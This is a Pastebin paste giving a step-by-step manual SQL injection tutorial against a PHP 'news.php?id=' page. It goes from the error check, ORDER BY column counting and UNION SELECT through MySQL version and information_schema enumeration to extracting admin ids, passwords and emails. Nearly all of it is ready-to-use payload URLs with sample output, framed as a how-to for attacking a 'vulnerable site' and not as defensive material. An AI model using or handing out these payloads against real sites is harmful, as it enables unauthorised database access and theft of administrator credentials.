API tools faq
paste
Advertisement
Kyfx

Sqli Injecting Manually :)

Kyfx
Nov 28th, 2015
890
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.87 KB | None | 0 0
raw download clone embed print report
  1. Injecting a site
  2. now you got your vulnerable site
  3. http://www.site.comnews.php/?id=-17' add ' to the end to check if its vulnerable
  4. it gets error,i know its vulnerable so i remove the ' and do
  5. http://www.site.com/news.php?id=17 order by 1--
  6. http://www.site.com/news.php?id=17 order by 2--
  7. http://www.site.com/news.php?id=17 order by 3--
  8. No errors i continue etc etc
  9. i finally get an error when i do like below
  10. http://www.site.com/news.php?id=17 order by 13--
  11. so this tells me 13 columns dont exist,so there must be 12 columns in the database
  12. so next i do the UNION SELECT function as shown below
  13. http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- (note make sure to add a - in between = 17 like =-17 in the ID)
  14. i Hit enter
  15. Numbers 4 and 5 appear,this means data can be extracted from numbers for and five
  16. I Replace 4 in the url with @@version so it now looks like
  17. http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12--
  18. The i hit enter
  19. 5.0.32-Debian_7etch8-log
  20. ^this is the mysql version running,So its running version 5 that helps alot,(versions 4 and below we have the guess the table name's)
  21. Now
  22. Where we put @@version (4th spot)
  23. Replace it with
  24. group_concat(table_name) <<gets table name
  25. like
  26. http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12--
  27. And at the end of union select string remove the -- after the 12 and add
  28. +from+information_schema.tables+where+table_schema=database()--
  29. So it now looks like
  30. http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--
  31. i Now see
  32. x_admins,x_articles,x_ban,x_banners,x_banners_info,x_comments,x_file_categories, ​ x_file_data,x_forum_a,x_forum_b,x_forum_c,x_gbook,x_infopages,x_links_categories ​ ,x_links_data,x_mails,x_menu,x_news,x_poll_data,x_poll_desc,x_pw,x_topic,x_users ​
  33. Now replace group_Concat(table_name) with group_concat(column_name) and everything after union select 5,6,7,8,9,10,11,12 with
  34. +from+information_schema.columns+where+table_name='x_admins'--
  35. so it goes from
  36. http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--
  37. TO
  38. http://www.site/news.php?id=-17 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 +from+information_schema.columns+where+table_name='x_admins'--
  39. we see id,nick,pass,name,added,access,mail,stat
  40. Learn about grouping at this point but now we add
  41. group_concat(id,0x3a,pass,0x3a,mail) to were the group_concat(column_name) is and add +from+x_admins-- after 10,11,12
  42. So the string becomes
  43. http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(id,0x3a,pass,0x3a,mail),5,6,7,8,9,10,11,12 +from+x_admins--
  44. At this point we obtain the admins password
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!